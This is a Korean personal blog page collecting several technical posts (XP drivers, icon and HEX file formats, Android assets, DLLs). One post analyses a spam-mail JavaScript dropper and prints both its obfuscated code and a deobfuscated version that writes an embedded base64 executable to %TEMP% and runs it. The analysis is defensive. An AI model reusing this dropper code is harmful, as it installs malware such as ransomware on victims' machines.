• Home
  • Tag
  • LocationLog
  • Guestbook
  • Admin
  • Write
블로그 이미지

감사합니다.

안녕1999

카테고리

전체 (3067)
자바스크립트 (20)
안드로이드 (14)
WebGL (4)
변비 (17)
정치,경제 (35)
C언어,ARM (162)
컴퓨터(PC, Note Book, 윈.. (41)
전자회로, PCB (27)
유머,안웃긴,GIF,동영상 (118)
국부론60 (71)
모듈(PCB) (3)
건강 (2)
FreeCAD (25)
PADS (43)
퇴직,퇴사,구직,취업 활동 (3)
C# (86)
엑셀 (8)
워드 (0)
LabView (6)
레고 (30)
FPGA (0)
Total
Today
Yesterday
Tistory 로고 이미지 티스토리 가입하기!
태그 : 지역로그
방명록 : 관리자 : 글쓰기
Blog is powered
by Daum /
Designed by Tistory
RSS FEED

달력

« » 2025.5
일 월 화 수 목 금 토
1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

공지사항

태그목록

  • 공무원
  • 방법
  • 옥션
  • XP
  • 자바스크립트
  • 에러
  • 핸드폰
  • 문제
  • 맛집
  • 안드로이드
  • 비교
  • C
  • 정부
  • 문재인
  • 레고
  • GCC
  • 이유
  • 대통령
  • 개선
  • 개발
  • 어린이
  • arm
  • 프로그램
  • 광고
  • 매실
  • 윈도우
  • 갤럭시
  • pcb
  • 제천
  • 경제

최근에 올라온 글

'파일'에 해당되는 글 7건

  1. 2017.05.17 윈도우XP - 갤럭시 USB 드라이버 설치방법 2
  2. 2017.02.25 아이콘 파일 구조
  3. 2017.02.05 안드로이드 - assets 폴더
  4. 2016.09.09 STMicroelectronics HEX파일 gcc HEX파일 비교
  5. 2016.08.30 윈도우 배치파일 긴문장을 여러줄로 나누어 작성하려면
  6. 2016.07.23 스펨 메일의 정체 분석
  7. 2016.03.24 프로그래밍 - DLL만들기

윈도우XP - 갤럭시 USB 드라이버 설치방법

카테고리 없음 / 2017. 5. 17. 23:30
  • 2017.05.17 윈도우XP - 갤럭시 USB 드라이버 설치방법
  • 2017.01.02 윈도우XP 새로 설치했더니, 갤럭시 J7 이동식디스크 인식이 안된다.


  • 통합 USB 드라이버 먼져 설치

    (SAMSUNG_USB_Driver_for_Mobile_Phones.exe)



    필요한 구역이 INF에 없습니다.


    윈도우 미디어 플레이어 업데이트(윈도우 정품인증 필요) 하면 된다고 하네요. 

    지난번에는 문제없었는데, 그사이에 무언가 바뀐 모양입니다.


    설치가 안되는 경우,

    윈도우 미디어플래이어11을 다운로드한다.

    wmp11-windowsxp-x86-KO-KR.exe을 7zip등의 압축프로그램으로 압축을 푼다.(마우스 우클릭)


    아래순서대로 설치했더니, XP에서 갤럭시 이동식디스크 인식이 된다.

    umdf.exe    <<----설치1 

    umdf.zip


    WindowsXP-MSCompPackV1-x86.exe    <<----설치2

    WindowsXP-MSCompPackV1-x86.zip


    wmdbexport.exe    <<----설치3

    wmdbexport.zip


    wmfdist11.exe   <<----설치4

    wmfdist11.zip


























    Download 7-Zip 17.00 beta (2017-04-29) for Windows:

    LinkTypeWindowsDescription
    Download.exe32-bit x867-Zip for 32-bit Windows
    Download.exe64-bit x647-Zip for 64-bit Windows x64 (Intel 64 or AMD64)

    Windows Media Player

    For your system: Windows XP 32-bit
    언어 선택:
    다운로드








    정품인증이 안되면, "Windows 10 N 및 KN 버전을 위한 미디어 기능 팩" 설치.  KB3099229_x86.msu


    XP에서, msu는 윈도우 인스톨러가 있어야 한다.


    Windows Installer 4.5 Redistributable

    Select Language:
    Download

    Windows 10 N 및 KN 버전을 위한 미디어 기능 팩

    언어 선택:
    다운로드


    저작자표시 비영리 변경금지 (새창열림)
    Posted by 안녕1999
    , |

    아이콘 파일 구조

    카테고리 없음 / 2017. 2. 25. 23:30

    아이콘 만드는 프로그램도 있고, 인터넷으로 변환해주는 사이트도 있다.
    32x32 24bit color 아이콘 파일 구조
    아이콘 파일 1개에는 여러가지 크기의 아이콘이 같이 들어 있을 수 있다.
    32는 16진수로 0x20
    헤더 + BMP이미지 + 투명정보(모노비트맵이미지)
    BGRx 4바이트


    24비트 BMP 파일 구조
    BGR 24비트 데이터가 들어 있다. 03=B, 02=G, 01=R




    Convert your image to ICO format - Online image converter

    image.online-convert.com/convert-to-ico
    이 페이지 번역하기
    Convert your image to the ICO format with this free online ICO conversion tool. ... If you do not enter an image size, your file will get automatically resized to that ... HDR to ICO,; HRZ to ICO,; ICB to ICO,; ICO to ICO,; ICON to ICO,; IPL to ICO, ...


    저작자표시 비영리 변경금지 (새창열림)
    Posted by 안녕1999
    , |

    안드로이드 - assets 폴더

    안드로이드 / 2017. 2. 5. 23:30

    안드로이드 개발 폴더에 보면, assets 폴더가 있다.

    assets에 파일을 넣으면, apk파일에 포함이 되어, AssetManager로 접근할 수 있다.

    - 파일크기는 (기본) 1M이하(압축안된 상태. 큰파일도 된다.)

    - jpg,png,mp3,wav,. ... 이외의 확장자 파일은 자동으로 압축되어진다.




    ㅈㅅㄹ :: 안드로이드 Asset 사용에 있어 몇가지...

    zeph1e.tistory.com/49
    2011. 8. 5. - 아시는 분들은 다 아시겠지만 asset을 패키지에 포함시키는 방법은 쉽다. ... 안드로이드 SDK에서 apk를 묶을 때, aapt는 몇 가지 확장자를 제외하고 ...

    APK Expansion Files | Android Developers

    https://developer.android.com/google/play/expansion-files.html
    이 페이지 번역하기
    Google Play currently requires that your APK file be no more than 100MB. For most applications, this is plenty of space for all the application's code and assets.


    저작자표시 비영리 변경금지 (새창열림)

    '안드로이드' 카테고리의 다른 글

    안드로이드 - Looper  (0) 2017.02.18
    안드로이드 - NDK 사용법  (0) 2017.02.18
    ant로 안드로이드 앱을 자동으로 빌드하자  (0) 2017.02.04
    안드로이드 - keystore 파일  (0) 2017.02.04
    안드로이드 NDK 컴파일 환경 구축2  (0) 2017.01.28
    Posted by 안녕1999
    , |

    STMicroelectronics HEX파일 gcc HEX파일 비교

    C언어,ARM / 2016. 9. 9. 23:30

    STMicroelectronics flash loader.exe


    STMicroelectronics HEX 파일

    :020000040800F2

    :10000000900B00202DD20008DDB60008DFB60008F6

    :10001000E1B60008E3B60008E5B6000800000000FD

    :10002000000000000000000000000000E7B600082B

    :10003000E9B6000800000000EBB60008EDB60008C5

    :10004000B5D20008F5B60008BDD200088FBA000886

    :10005000C5D20008C9D20008CDD2000819B70008DF

    :10006000D5D20008D9D20008DDD20008E1D20008BC

    :10007000E5D20008E9D20008EDD20008F1D200086C

    :10008000F5D20008F9D20008FDD2000801D300081B

    :1000900005D3000809D300080DD3000811D30008C8

    :1000A00015D3000819D300081DD3000821D3000878



    gcc HEX파일(verilog)

    arm-none-eabi-objcopy -S main.o -O verilog ..\main.hex

    @08000000

    00 00 02 20 C1 68 00 08 21 08 00 08 25 08 00 08 

    29 08 00 08 2D 08 00 08 31 08 00 08 00 00 00 00 

    00 00 00 00 00 00 00 00 00 00 00 00 35 08 00 08 

    39 08 00 08 00 00 00 00 3D 08 00 08 41 08 00 08 

    05 69 00 08 51 08 00 08 05 69 00 08 A1 0B 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 79 08 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    85 08 00 08 05 09 00 08 45 0A 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 D9 0B 00 08 85 0C 00 08 31 0D 00 08 

    D5 0B 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 D1 0B 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 05 69 00 08 05 69 00 08 05 69 00 08 

    05 69 00 08 

    @08000184

    10 B5 05 4C 23 78 33 B9 04 4B 13 B1 04 48 AF F3 

    00 80 01 23 23 70 10 BD A0 04 00 20 00 00 00 00 

    84 01 00 08 08 4B 10 B5 1B B1 08 48 08 49 AF F3 

    00 80 08 48 03 68 03 B9 10 BD 07 4B 00 2B FB D0  



    gcc HEX파일(ihex 인텔헥사파일)

    arm-none-eabi-objcopy -S main.o -O ihex ..\main.hex

    :020000040800F2

    :1000000000000220496900082108000825080008AE

    :10001000290800082D080008310800080000000029

    :10002000000000000000000000000000350800088B

    :1000300039080008000000003D08000841080008D9

    :100040008D690008510800088D690008A10B00089F

    :100050008D6900088D6900088D690008790800081D

    :100060008D6900088D6900088D6900088D69000898

    :100070008D6900088D6900088D6900088D69000888

    :100080008D6900088D6900088D6900088D69000878

    :100090008D6900088D6900088D6900088D69000868

    :1000A0008D6900088D6900088D6900088D69000858

    :1000B0008508000805090008450A00088D69000840

    :1000C0008D6900088D6900088D6900088D69000838

    :1000D0008D690008D90B0008850C0008310D000857

    :1000E000D50B00088D6900088D6900088D6900082E

    :1000F0008D6900088D6900088D6900088D69000808

    :100100008D6900088D6900088D6900088D690008F7

    :100110008D6900088D6900088D6900088D690008E7

    :100120008D6900088D6900088D6900088D690008D7

    :100130008D6900088D6900088D6900088D690008C7

    :100140008D6900088D6900088D690008D10B0008D1

    :100150008D6900088D6900088D6900088D690008A7

    :100160008D6900088D6900088D6900088D69000897

    :100170008D6900088D6900088D6900088D69000887

    :040180008D6900087D

    :1001840010B5054C237833B9044B13B10448AFF3CD 





    저작자표시 비영리 변경금지 (새창열림)

    'C언어,ARM' 카테고리의 다른 글

    warning C4027: function declared without formal parameter list  (0) 2016.09.20
    VC++ 6.0 으로 gcc 크로스 컴파일 환경 구축 방법  (0) 2016.09.09
    gcc hex, bin file size 줄이기  (0) 2016.09.09
    LinkerScript - stm32_flash.ld  (0) 2016.09.09
    uint64_t gcc err  (0) 2016.09.09
    Posted by 안녕1999
    , |

    윈도우 배치파일 긴문장을 여러줄로 나누어 작성하려면

    카테고리 없음 / 2016. 8. 30. 23:30

    윈도우 배치파일 긴문장을 여러줄로 나누어 작성하려면

    문장의 끝에 ^ 문자를 붙이면 됨.(유닉스는 \)

    저작자표시 비영리 변경금지 (새창열림)
    Posted by 안녕1999
    , |

    스펨 메일의 정체 분석

    카테고리 없음 / 2016. 7. 23. 01:00

    요즘 회사메일로 스펨메일이 많이 오고 있다.

    스펨등록을 해도 소용이 없다. 매번 다른 메일주소로 날라오니...


    너무 많이 오는통에, 짜증이나서,

    이 쓰레기같은 메일이 무엇인지 분석해보았다.


    첨부파일은 압축파일이며,

    압축파일 안에는 자바스크립트 파일이 들어 있다.


    자바스크립트파일은 메모장에서도 편집이 가능하다.

    var ZYb = " 321" + "";

    var KXi6 = "Run" + "";

    var Ts = "in" + "";

    var Gf9 = ".b" + "";

    var Nk2 = "xe" + "";

    var ZQl = ".e" + "";

    function YPp4(Qp){return Qp;};var FGi3 = "l" + "";

    var Pg6 = "ESv" + "";

    var ELz = "K2DPj" + "";

    function Fw5(NGi){return NGi;};var Yh7 = "%/" + "";

    var PEl = "MP" + "";

    var Hm = "%TE" + "";

    function So4(XUz3){return XUz3;};var Gj = "l" + "";

    var Dv8 = "Shel" + "";

    var Uq = "pt." + "";

    var YBh = "WScri" + "";


    (생략) 


    var v_bin = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAA

    Byd01o5gz0vfxXl3DacBcKAAAM9JWvsaeyBL39oHJffNj7F6LwjPS9/G5+91gzYvCMwVI5FEAM9L38YvC

    /1g2uAgAAa8ARM8Mz21OJRfj/FeT4QAD/1ovw/9cD8P/Xi038A8YxRfgz0oHJu7fc0WoEWPfxM9K5fvyty

    BACU9m57XofjjQQAzRZwFfGFRqjPA99A10Gx46PfQjQC4pdhO1VCPhWD///+4UtQ2Bf915I+FWP///+h

    6iQ/g6MGH/OLHRxBbZ1XYj1SZ9grtGMkROxWRLV0V3b/XmTqmd0F86fNumVTqOJOjb15Ufh8rFM2OF


    (생략) 

    var WUc6          = 1
    var BMd             = (8330 - 8330)
    var VKb = (-6867 + 6869)
    var WMg4          = (9211 - 9210)

    function UBb2(Rl, Nh8) {
        var TYp = WScript[Op + Gu + Tz]((function Ex9(){return VAg;}()) + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6);
        var UQp = TYp[CYr + ALc + (function FSn(){return RCm6;}())](Rl);
        var Pe0 = UQp[GRq + GHc + TXp + (function XTm4(){return Gf;}())](WUc6, BMd);
        
        var Zn = WScript[SSz0(Op) + (function By(){return Gu;}()) + Tz](Pr + Km + Io + Cj + Sb + UTx);
        var KBc3 = Zn[AJc5 + Vi8 + ZOa2(Vk) + UGy](Ci0 + Gl + DUt8);
        KBc3[Vf + Vv] = "bin.base64";
        
        KBc3[AJh8] = Pe0[Ra9(RDj) + Io0(Za9)]();
        
        var CFt2 = WScript[Op + Gu + Tz](APa7 + Vi2 + (function OBc8(){return Oi8;}()) + JQd + WPi8(XTq));
        CFt2[AZl4] = WMg4;
        CFt2[YVm + (function LKz6(){return TPz;}())]();
        
        CFt2[FHb7 + EFk](KBc3[Lr4 + Gn4 + Px + Yy + WRr]);
        CFt2[Pw5 + Me + SPa2 + CBe](Nh8, VKb);
        
        Pe0[Mk]();
        CFt2[Mk]();
    }


    function Vx5(QFk, Nh8)
    {
       var Og, NKj, QGj8
       var PDt2 = 31 - 30, AWl3 = 2;
       Og = new ActiveXObject(VAg + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6)
       NKj = Og[HXi5 + (function VPk1(){return Nb0;}()) + BIy3 + Kh4](Nh8, AWl3, true)
       NKj[FHb7 + EFk](QFk);
       NKj[Mk]();
       NKj = Og[Em9(HXi5) + Nb0 + BIy3 + Kh4](Nh8, PDt2);
       QGj8 = NKj[IBc + Yb1 + Nf8]();
       return(QGj8);
    }

    var EQl7=WScript[Op + OXk7(Gu) + Tz]((function WQg(){return YBh;}()) + Uq + Dv8 + So4(Gj));
    var HHo3=EQl7.ExpandEnvironmentStrings(Hm + Fw5(PEl) + (function At(){return Yh7;}()));
    var Gw5=HHo3 + ELz + YPp4(Pg6) + FGi3;
    var RZh4=Gw5 + ZQl + Nk2;
    var v_binpath=RZh4+Gf9+Ts;

    try {
    Vx5(v_bin, v_binpath);
    UBb2(v_binpath, RZh4);
    //EQl7[KXi6](RZh4 + ZYb);
    }
    catch (e) {WScript.Quit(1);};
    WScript.Quit(0);



    자바스크립트는 위와 같이 암호화 되어 있다.


    var v_bin = "TVqQAAMAAAAEAAAA..."

    이 내용은 Base64라는 코딩 방식이며, 내용물은 실행파일이 들어 있다.


    스크립트문을 풀어보면


    function Base64_to_bin_file(Rl, Nh8) {

        var TYp = WScript["CreateObject"]("Scripting.FileSystemObject");

        var UQp = TYp["GetFile"](Rl);

        var Pe0 = UQp["OpenAsTextStream"](1, 0);

        

        var Zn = WScript["CreateObject"]("MSXml2.DOMDocument");

        var KBc3 = Zn["createElement"]("Base64Data");

        KBc3["dataType"] = "bin.base64";

        

        KBc3["text"] = Pe0["ReadAll"]();

        

        var CFt2 = WScript["CreateObject"]("ADODB.Stream");

        CFt2["Type"] = 1;

        CFt2["Open"]();

        

        CFt2["Write"](KBc3["nodeTypedValue"]);

        CFt2["SaveToFile"](Nh8, 2);

        

        Pe0["Close"]();

        CFt2["Close"]();

    }



    function Create_K2DPjESvl_exe(QFk, Nh8)

    {

       var Og, NKj, QGj8

       Og = new ActiveXObject("Scripting.FileSystemObject")

       NKj = Og["OpenTextFile"](Nh8, 2, true)

       NKj["Write"](QFk);

       NKj["Close"]();

       NKj = Og["OpenTextFile"](Nh8, 1);

       QGj8 = NKj["ReadLine"]();

       return(QGj8);

    }


    var EQl7=WScript["CreateObject"]("WScript.Shell");


    var v_binpath=EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe.bin";


    try {

    Create_K2DPjESvl_exe(v_bin, v_binpath);

    Base64_to_bin_file(v_binpath, EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe");

    EQl7["Run"](EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe 321");

    }

    catch (e) {WScript.Quit(1);};

    WScript.Quit(0); 


    위와 같이 아주 간단한 내용이다.


    var v_bin = "TVqQAAMAAAAEAAAA..."

    이내용을 파일로 저장하고, 다시 읽어서, Base64로 실행파일로 저장한 다음, 실행한다.


    메일을 받은 사람이 자바스크립트 파일을 열어보는 순간, 자바스크립트가 실행되어,

    실행파일을 생성하고, 실행파일을 동작시킨다.


    (메모장으로 열때는 편집만 된다. 실행은 안된다.)

    그러나 실수로, 인터넷 익스플로어로 열게되면, 자바스크립트가 실행된다.


    실행파일의 내용은 시간관계상 분석 못한다.

    관심있는분이 분석해주시면 감사하겠습니다.


    INV000 b1a7.js(바이러스).zip


    위 파일에는 내가 메일로 받은 파일이 들어있다.

    안전을 위해, 파일확장자를 txt로 바꾸었으니, 실행되지는 않는다.

    또한, 안전을 위해, 실행파일을 실행하는 명령은 주석처리가 되어 있다.

    받아서, 메모장으로 열어봐도 문제는 없다.



    보나마나 뻔한게, 랜섬웨어일 가능성이 높다.

    요즘 돈되는건 랜섬웨어가 최고이니...


    랜섬웨어는 하드디스크의 파일을 암호화시키고, 돈을 요구하는 프로그램이다.

    돈 안주면, 파일 복구못한다.



    마지막 실행문장은 제거후, 자바스크립트를 실행해서, 실행파일을 생성했다.

    실행파일은 %TEMP%폴더에 생성된다.

    윈도우 탐색기 주소창에 넣으면, 해당 폴더로 이동한다.


    실행파일의 정보는 위와 같다.




    실행파일이 사용하는 함수는 위와 같다. 177k의 비교적 작은 크기임에도, 온갖 종류의 기능은 다 사용하는듯 하다.

    아마, 한번 실행되면, 여기저기 복사본을 만들듯 싶다.

    스펨광고창부터, 랜섬웨어 기능까지...(추측)



    Logo

    www.hybrid-analysis.com

    멜웨어, 바이러스등을 무료로, 자동으로 분석해주는 사이트이다.

    분석결과는 "잘 모르겠음" ㅎㅎ(예상한대로)


    https://www.hybrid-analysis.com/sample/0ae741fbcae6fb5af7bdec6e8219d02b522e74ac20906703b2573e14d1101252?environmentId=100


    가상PC에서 직접 실행하면서 분석하기도 하나봅니다.


    프로그램이라는게, 실행파일이 되면, 기계어코드만 남기때문에, 해당 코드가 무슨 목적으로 동작하는지 분석하기는 쉽지 않습니다.

    해당 프로그램이 어떤 함수들을 호출하더라...는 정보로, 대충, 이럴것이다.

    좀더 의심이 가면, 하나씩 분석을하게되면, 시간이 상당히 오래걸립니다.


    제거 보기에는 이 프로그램은 암호화 기능을 사용해서, 랜덤하게 프로그램 코드를 생성하는듯 싶습니다.

    그래야 백신프로그램도 잘 못잡거든요.


    어쨌든, 전 시간이 없어, 더이상은 못합니다.


    관심있으신분들 한번 분석해보시기 바랍니다.




    1. 안랩 랜섬웨어예방 - ahnlab.com‎

      광고www.ahnlab.com/‎
      최신 랜섬웨어 정보부터 피해 예방 가이드, 전용 백신까지!
      한국을 목표로 한 랜섬웨어, CryptoLocker 상세정보

    검색결과

    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 감염되어 암호화 된 파일은 복호화 키가 없으면 복구가 불가능하다. 따라서 중요한 사용자 문서나 데이터들은 물리적으로 분리된 저장소에 정기적으로 백업해두는 습관을 길러 악성코드에 감염되더라도 피해를 최소화 할 수 있도록 해야 한다.2015. 11. 4.

    [보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

    www.hauri.co.kr/information/notice_view.html?intSeq=179&page=1
    사용자 의견
    이 결과에 관한 정보 • 

    랜섬웨어 - 나무위키

    https://namu.wiki/w/랜섬웨어
    주의: 혹시 이 문서에 들어오신 분 중, 랜섬웨어에 감염되신 분이 있다면 당장 PC를 강제종료하고 모바일로 보시길 바랍니다! 컴퓨터를 계속 켜 두고 있으면 아직 ...

    안랩 랜섬웨어 보안센터 | AhnLab

    www.ahnlab.co.kr/kr/site/securityinfo/ransomware/index.do
    랜섬웨어 피해가 확산되고 있어 각별한 주의가 필요합니다. 안랩은 랜섬웨어 동향과 피해 예방을 위한 보안 가이드를 드립니다.

    [정보보호]걸리면 끝(?) 랜섬웨어...이렇게 하면 막는다 - 대한민국 IT포털 ...

    www.etnews.com/20151108000034
    2015. 11. 8. - PC에 저장된 사진, 동영상, 문서 파일을 인질로 잡는 랜섬웨어 피해가 급증했다. 랜섬웨어에 걸리면 이같은 메시지가 나타난다. (자료:알약블로그) ...

    랜섬웨어 관련 이미지이미지 신고
    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 대한 이미지 검색결과
    랜섬웨어에 대한 이미지 더보기

    [보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

    www.hauri.co.kr › 보안정보 › 보안공지
    2015. 11. 4. - 랜섬웨어는 ransom(몸값)과 ware(제품)의 합성어로 컴퓨터 사용자의 PC나 문서를 '인질'로 잡고 돈을 요구한다고 해서 붙여진 명칭이다. 1989년 ...

    뉴스
    뉴스 검색결과의 이미지
    "어떤 랜섬웨어나 해커도 침투 못 해"
    Korea Daily‎ - 1일 전
    '랜섬웨어'로 인한 피해가 연일 발생하는 등 컴퓨터 보안 문제가 심각한 사회문제로 대두하고 ...
    랜섬웨어에 대한 뉴스 더보기

    알약 공식 블로그 :: 랜섬웨어 'Crypt0L0cker'주의! - 알약(Alyac)

    blog.alyac.co.kr/305
    2015. 4. 21. - 이번에 발견된 랜섬웨어는 드라이브 바이 다운로드 형식으로 유포되고 있습니다. 드라이브 바이 다운로드는 OS 및 SW의 보안취약점을 통해 변조된 ...

    랜섬웨어 제거 | 랜섬웨어란 무엇입니까 | Microsoft 보안

    https://www.microsoft.com/ko-kr/security/.../ransomware-whatis.aspx
    랜섬웨어란 무엇입니까? 랜섬웨어는 일종의 맬웨어 (악성 소프트웨어)로 사용자의 동의없이 해당 컴퓨터에 불법으로 설치됩니다. 불법으로 설치된 랜섬웨어로 해당 ...

    한국랜섬웨어침해대응센터

    https://www.rancert.com/
    랜섬웨어진단/보안컨설팅, 침해사고접수/신고, 각종 피해사례 및 대응 방법 제공.

    랜섬웨어 대응센터 - 한국트렌드마이크로

    www.trendmicro.co.kr/kr/security-intelligence/ransomware/
    트렌드마이크로 랜섬웨어 대응 솔루션. [기업] 이메일 탐지 및 차단 Deep Discovery Email Inspector. 새롭게 출현하는 랜섬웨어의 90% 이상은 피해자들의 이메일을 ..


    저작자표시 비영리 변경금지 (새창열림)
    Posted by 안녕1999
    , |

    프로그래밍 - DLL만들기

    카테고리 없음 / 2016. 3. 24. 09:37

    VC++6.0 기준


    Lib파일로 DLL을 만들 수 있을까?

    ------------------------------

    가능해 보임


    DLL을 Lib로 만들 수 있을까?

    ---------------------------

    된다고 함.


    exe를 Lib로 만들 수 있을까?

    --------------------------

    될것 같음



    기존 소스를 최소한의 수정으로 DLL을 만드는 방법은?

    -------------------------------------------------

    DLL을 만들려면, dllexport, dllimport 매크로를 기존 함수 앞에 붙여줘야한다.

    소스파일이 너무 많은 경우, 함수마다 일일이 다 붙여주기도 힘들다.

    LIB_DLL_API 매크로는 해당 함수가 DLL에서 외부로 보여지게 만들어 준다.

    표시가 없는 경우, DLL내부에 존재는 하지만, 외부에서 해당함수를 찾아서 사용할 수 없다.


    #ifdef LIB_DLL_EXPORTS

    #define LIB_DLL_API __declspec(dllexport)

    #else

    #define LIB_DLL_API __declspec(dllimport)

    #endif


    1) 헤더파일에만 표시해줘도 된다.

       소스파일에는 표시 안해도 됨.




    실행파일에서 DLL링크 방법

    -------------------------

    DLL을 만들때, Lib파일도 같이 만들어진다.

    VC++6.0 에서는 DLL파일이 만들어지는 경로는 지정할 수 있으나,

    Lib파일이 만들어지는 경로는 Debug나 Release로 고정된듯하다.


    아래와 같이 Lib 파일을 지정경로(개인용 Lib)로 복사하는 파일을 만들어 두고, 컴파일 후, 한번씩 실행해준다.

    (컴파일 후, 자동으로 실행해주는 기능은 없는듯함)


    //copy lib to Lib.bat

    copy D:\C\Lib_DLL\Debug\aD.lib D:\C\Lib\aD.lib

    copy D:\C\Lib_DLL\Release\a.lib D:\C\Lib\a.lib


    정적링크/동적링크

    ------------------

    1) 정적링크

    실행파일을 만들때, DLL만들때 생성된 Lib파일을 참조하여,

    exe파일 실행시, DLL파일의 함수들을 한꺼번에, 자동으로 끌어오는 방법이다.

    exe파일 실행시, DLL파일이 없다면, 에러를 내뿜고 종료된다.


    2) 동적링크

    exe파일에서, 필요시, DLL파일의 특정함수를 끌어오는 기능이다.

    사용자가 GetProcAddress, LoadLibrary함수를 사용해서, 각 함수별로 끌어와야한다.

    함수포인터변수를 만들고, 해당함수의 주소를 불러오는것이다.

    함수 포인터 변수(함수별로 각각 모양이 다름)+함수명(문자열)+끌어오는 코드가 필요함.

    exe파일 실행시, DLL이 없는 경우 사용자가 에러를 핸들링할 수 있다.

    동적링크는 주로, 윈도우의 시스템 DLL에 있는 함수를 끌어올때 사용한다.


    디버그용과 릴리즈용 DLL  구분

    ----------------------------

    디버그용과 릴리즈용 DLL을 만들어야 디버깅이 편하다.

    디버그용은 소스가 있다면, DLL 내부까지 디버깅이 가능하다.

    보통 디버그용은 파일명 뒤에 'D"를 붙인다.


    exe파일에서 DLL정적 링크

    -----------------------------

    #include "..\Lib\a_DLL.h"

    #ifdef _DEBUG

    #pragma comment(lib, "a_DLLD.lib")

    #else

    #pragma comment(lib, "a_DLL.lib")

    #endif



    기존에 만들어둔 Lib파일을 일괄적으로 DLL로 변환할 수 있을까?

    ----------------------------------------------------------

    헤더파일에 함수명앞에 DLL EXPORT 매크로만 추가하면 됨(?)



    DLL파일을 사용함으로써 장점,단점

    --------------------------------

    1) 장점

    - 컴파일 시간 감소(Lib와 동일)

    - 기존 Lib 파일 대비, 링크 시간 감소

    - 여러개의 프로그램이 있을때, DLL하나만 업데이트하여, 모든 프로그램의 성능이 개선될 수 있음.

    - 윈도우에서 DLL은 1개만 로드하므로, 여러개의 프로그램이 동시에 실행되고, 동일한 기능을 DLL로 묶을 경우,

      DLL파일 크기만큼 메모리가 절약되나, 3G정도의 메모리를 사용하는 요즘에는 1M크기의 DLL은 아무런 이득이 안됨.


    2) 단점

    - 프로그램 수정시, exe, DLL 2가지중에 어느것을 업데이트 해야할지 복잡해짐.

      exe파일로 만든 경우에는 exe 파일 한개만 교체하면, 업데이트가 되지만,

      DLL이 있는 경우, 어느것을 업데이트 해야할지, 아니면, 2개다 교체해줘야하는 번거로움이 있음.

    - exe, DLL버젼이 서로 안맞는 경우, 문제가 됨

    - DLL을 타인이 무작위로 사용할 수 있음.

    - DLL파일을 만들기위한 프로젝트를 만들고, 관리해야 함.

    - DLL이 분리되어 있어, DLL 내의 소스 수정이 필요한 경우, 절차가 번거로움.

      exe 파일은 한번에 모두 됨.

    - DLL이 수정된 경우, 해당 DLL을 사용하는 기존의 다름 프로그램도 영향을 받아, 문제가 될 수 있음.

    - DLL버젼 표시가 어려움.

      exe 파일에서 DLL파일의 버젼을 표시해주지 않는 이상, DLL파일의 날짜로만 구분이 가능해짐.


    평가 : 단점이 더 많아 보임....



    기타

    ----

    DLL파일을 동적링크함으로써, 해당 응용프로그램을 자유롭게 확장할 수 있다.

    저작자표시 비영리 변경금지 (새창열림)
    Posted by 안녕1999
    , |
    «이전 1 다음»

    최근에 달린 댓글

    글 보관함

    링크

    티스토리툴바